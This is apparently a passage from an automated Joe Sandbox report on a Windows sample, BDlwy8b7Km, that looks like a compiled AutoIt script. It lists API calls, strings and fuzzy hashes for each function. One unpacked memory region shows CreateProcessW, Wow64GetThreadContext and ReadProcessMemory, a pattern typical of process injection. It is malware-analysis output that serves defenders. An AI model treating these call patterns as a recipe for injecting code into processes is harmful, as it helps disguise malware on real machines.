                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005950AA,?,?,00000000,00000000), ref: 005942B2
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005950AA,?,?,00000000,00000000), ref: 005942C9
                                                  • LoadResource.KERNEL32(?,00000000,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20), ref: 005D35BE
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20), ref: 005D35D3
                                                  • LockResource.KERNEL32(005950AA,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20,?), ref: 005D35E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 2d8c62525f2b803845f6f0c430086ca160a551d8915d2c81e68847161f9bd247
                                                  • Instruction ID: c58cc078028b7ab471cb884d86139706a82dc821f861ed61b9782f66d4059ae2
                                                  • Opcode Fuzzy Hash: 2d8c62525f2b803845f6f0c430086ca160a551d8915d2c81e68847161f9bd247
                                                  • Instruction Fuzzy Hash: 2D117C74201B01BFEB218B65DC48F6B7FBAFFC5B61F208169B40296250DB71DD019A20

                                                  Control-flow Graph

                                                  APIs
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00592B6B
                                                    • Part of subcall function 00593A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00661418,?,00592E7F,?,?,?,00000000), ref: 00593A78
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00652224), ref: 005D2C10
                                                  • ShellExecuteW.SHELL32(00000000,?,?,00652224), ref: 005D2C17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                  • String ID: runas
                                                  • API String ID: 448630720-4000483414
                                                  • Opcode ID: d40e24da04b6e9107b77a83de8c5c214fd3494978cc8f478a6a5a048d1ff557a
                                                  • Instruction ID: bca6f6ac0bc7eb734ce263fa3e499904aece981b3ef6e6cabe5fa014c51b917b
                                                  • Opcode Fuzzy Hash: d40e24da04b6e9107b77a83de8c5c214fd3494978cc8f478a6a5a048d1ff557a
                                                  • Instruction Fuzzy Hash: C611B431108342AACF14FF64D8599BE7FE6BBE1351F48582DF542570A2CF658A0AC752
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,005D5222), ref: 005FDBCE
                                                  • GetFileAttributesW.KERNELBASE(?), ref: 005FDBDD
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 005FDBEE
                                                  • FindClose.KERNEL32(00000000), ref: 005FDBFA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                  • String ID:
                                                  • API String ID: 2695905019-0
                                                  Strings
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: p#f
                                                  • API String ID: 3964851224-2982675022
                                                  APIs
                                                  • GetInputState.USER32 ref: 0059D807
                                                  • timeGetTime.WINMM ref: 0059DA07
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0059DB28
                                                  • TranslateMessage.USER32(?), ref: 0059DB7B
                                                  • DispatchMessageW.USER32(?), ref: 0059DB89
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0059DB9F
                                                  • Sleep.KERNEL32(0000000A), ref: 0059DBB1
                                                  Similarity
                                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                  • String ID:
                                                  • API String ID: 2189390790-0

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00592D07
                                                  • RegisterClassExW.USER32(00000030), ref: 00592D31
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00592D42
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00592D5F
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00592D6F
                                                  • LoadIconW.USER32(000000A9), ref: 00592D85
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00592D94
                                                  Strings
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 005D039A: CreateFileW.KERNELBASE(00000000,00000000,?,005D0704,?,?,00000000,?,005D0704,00000000,0000000C), ref: 005D03B7
                                                  • GetLastError.KERNEL32 ref: 005D076F
                                                  • __dosmaperr.LIBCMT ref: 005D0776
                                                  • GetFileType.KERNELBASE(00000000), ref: 005D0782
                                                  • GetLastError.KERNEL32 ref: 005D078C
                                                  • __dosmaperr.LIBCMT ref: 005D0795
                                                  • CloseHandle.KERNEL32(00000000), ref: 005D07B5
                                                  • CloseHandle.KERNEL32(?), ref: 005D08FF
                                                  • GetLastError.KERNEL32 ref: 005D0931
                                                  • __dosmaperr.LIBCMT ref: 005D0938
                                                  Strings
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00593A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00661418,?,00592E7F,?,?,?,00000000), ref: 00593A78
                                                    • Part of subcall function 00593357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00593379
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0059356A
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005D318D
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005D31CE
                                                  • RegCloseKey.ADVAPI32(?), ref: 005D3210
                                                  • _wcslen.LIBCMT ref: 005D3277
                                                  • _wcslen.LIBCMT ref: 005D3286
                                                  Strings
                                                  Similarity
                                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 98802146-2727554177

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00592B8E
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00592B9D
                                                  • LoadIconW.USER32(00000063), ref: 00592BB3
                                                  • LoadIconW.USER32(000000A4), ref: 00592BC5
                                                  • LoadIconW.USER32(000000A2), ref: 00592BD7
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00592BEF
                                                  • RegisterClassExW.USER32(?), ref: 00592C40
                                                    • Part of subcall function 00592CD4: GetSysColorBrush.USER32(0000000F), ref: 00592D07
                                                    • Part of subcall function 00592CD4: RegisterClassExW.USER32(00000030), ref: 00592D31
                                                    • Part of subcall function 00592CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00592D42
                                                    • Part of subcall function 00592CD4: InitCommonControlsEx.COMCTL32(?), ref: 00592D5F
                                                    • Part of subcall function 00592CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00592D6F
                                                    • Part of subcall function 00592CD4: LoadIconW.USER32(000000A9), ref: 00592D85
                                                    • Part of subcall function 00592CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00592D94
                                                  Strings
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026

                                                  Control-flow Graph

                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0059316A,?,?), ref: 005931D8
                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,0059316A,?,?), ref: 00593204
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00593227
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0059316A,?,?), ref: 00593232
                                                  • CreatePopupMenu.USER32 ref: 00593246
                                                  • PostQuitMessage.USER32(00000000), ref: 00593267
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D%f$D%f$D%f$D%f$D%fD%f$Variable must be of type 'Object'.
                                                  • API String ID: 0-4125818173
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0059FE66
                                                  Strings
                                                  Similarity
                                                  • API ID: Init_thread_footer
                                                  • String ID: D%f$D%f$D%f$D%f$D%fD%f
                                                  • API String ID: 1385522511-2392613657

                                                  Control-flow Graph (entry block 165bfd0-165c07e; rendered graph omitted)
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0165C0A1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0165C2C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0

                                                  Control-flow Graph (single block 592c63-592cd3: CreateWindowExW * 2, ShowWindow * 2; rendered graph omitted)
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00592C91
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00592CB2
                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00591CAD,?), ref: 00592CC6
                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00591CAD,?), ref: 00592CCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399

                                                  Control-flow Graph (entry block 165bda0-165becc; rendered graph omitted)
                                                  APIs
                                                    • Part of subcall function 0165BC90: Sleep.KERNELBASE(000001F4), ref: 0165BCA1
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0165BEC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: KM5YOVVQ8E1ONN16OY5KUEW
                                                  • API String ID: 2694422964-3556859784

                                                  Control-flow Graph (entry block 602947-6029b9; rendered graph omitted)
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602C05
                                                  • DeleteFileW.KERNEL32(?), ref: 00602C87
                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00602C9D
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602CAE
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00602CC0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$Copy
                                                  • String ID:
                                                  • API String ID: 3226157194-0

                                                  Control-flow Graph (entry block 5c5aa9-5c5ace; rendered graph omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: JOY
                                                  • API String ID: 0-3877268382

                                                  Control-flow Graph (entry block 593b1c-593b27; rendered graph omitted)
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B40
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B61
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00593B0F,SwapMouseButtons,00000004,?), ref: 00593B83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0165B44B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0165B4E1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0165B503
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1732028781.0000000001659000.00000040.00000020.00020000.00000000.sdmp, Offset: 01659000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1659000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  APIs
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 005D2C8C
                                                    • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                                                    • Part of subcall function 00592DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00592DC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen
                                                  • String ID: X$`ee
                                                  • API String ID: 779396738-2358545003
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 005B0668
                                                    • Part of subcall function 005B32A4: RaiseException.KERNEL32(?,?,?,005B068A,?,00661444,?,?,?,?,?,?,005B068A,00591129,00658738,00591129), ref: 005B3304
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 005B0685
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                  • String ID: Unknown exception
                                                  • API String ID: 3476068407-410509341
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0060302F
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00603044
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 551b0df81595fccdfa0d82bb4a058d5d54b58e3d7522d2dab6eb810591ad490c
                                                  • Instruction ID: 24bf46b3e2feeba08d3e69509342f3732bd2ad64445131a2b16015b8e0d82fd6
                                                  • Opcode Fuzzy Hash: 551b0df81595fccdfa0d82bb4a058d5d54b58e3d7522d2dab6eb810591ad490c
                                                  • Instruction Fuzzy Hash: 0CD05E72501328A7DB30A7A4AC0EFCB3A6CDB04761F4002A1BA55E20A1DEB09A85CAD0
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006182F5
                                                  • TerminateProcess.KERNEL32(00000000), ref: 006182FC
                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 006184DD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                  • String ID:
                                                  • API String ID: 146820519-0
                                                  • Opcode ID: 7b608e79b01aff5a0969784813eecc54fe88444fe9c45a9daf1c61de9dc28fa8
                                                  • Instruction ID: 57c92640483a3433faac1e0a9fd95d87ac40aa1bc41dfd26d3d8ed1ec92f39c5
                                                  • Opcode Fuzzy Hash: 7b608e79b01aff5a0969784813eecc54fe88444fe9c45a9daf1c61de9dc28fa8
                                                  • Instruction Fuzzy Hash: 6D125D719083419FC714DF28C484B9ABBE6BF89314F18895DE8998B352DB31ED85CB92
                                                  APIs
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00591BF4
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00591BFC
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00591C07
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00591C12
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00591C1A
                                                    • Part of subcall function 00591BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00591C22
                                                    • Part of subcall function 00591B4A: RegisterWindowMessageW.USER32(00000004,?,005912C4), ref: 00591BA2
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0059136A
                                                  • OleInitialize.OLE32 ref: 00591388
                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 005D24AB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1986988660-0
                                                  • Opcode ID: e7f35d27efe979b5f2989885c165a698b487b62265657b1df563790f08a503f6
                                                  • Instruction ID: c3002673df5e6537fcc073fb9362de843f1cbc824a56888b993cddfe1044868b
                                                  • Opcode Fuzzy Hash: e7f35d27efe979b5f2989885c165a698b487b62265657b1df563790f08a503f6
                                                  • Instruction Fuzzy Hash: EC71C8F49116028FC784DF7AA859659BEE3BB8A35471CA22ED00BCF261EBB04441CF95
                                                  APIs
                                                    • Part of subcall function 00593923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00593A04
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005FC259
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 005FC261
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005FC270
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer$Kill
                                                  • String ID:
                                                  • API String ID: 3500052701-0
                                                  • Opcode ID: 5905056a3c4b9945fef965ebf3f9043b46bcb1acb88f7ce521382e429a2f6434
                                                  • Instruction ID: 75ded5874fea9561ab60c2b582efa0ae6013d67bc444e7dc18acc1d7b9e794a1
                                                  • Opcode Fuzzy Hash: 5905056a3c4b9945fef965ebf3f9043b46bcb1acb88f7ce521382e429a2f6434
                                                  • Instruction Fuzzy Hash: D531C57490434CAFEB329F648955BEBBFEDAF07304F0404A9D2DAA7241C7785A85CB51
                                                  APIs
                                                  • CloseHandle.KERNELBASE(00000000,00000000,?,?,005C85CC,?,00658CC8,0000000C), ref: 005C8704
                                                  • GetLastError.KERNEL32(?,005C85CC,?,00658CC8,0000000C), ref: 005C870E
                                                  • __dosmaperr.LIBCMT ref: 005C8739
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2583163307-0
                                                  • Opcode ID: 16720663de1002826667f8df37f3c8a40c3e0974b1c4e35a379d755bd12a22ff
                                                  • Instruction ID: 6e27572dad7a56dfbb7d69693a3845d0a59e91d386d35dc81197ee6ee6473831
                                                  • Opcode Fuzzy Hash: 16720663de1002826667f8df37f3c8a40c3e0974b1c4e35a379d755bd12a22ff
                                                  • Instruction Fuzzy Hash: B6012F326055602ED72466F45849F7F6F45ABD1B74F35061DF8148B1D2EDB1ACC18150
                                                  APIs
                                                  • TranslateMessage.USER32(?), ref: 0059DB7B
                                                  • DispatchMessageW.USER32(?), ref: 0059DB89
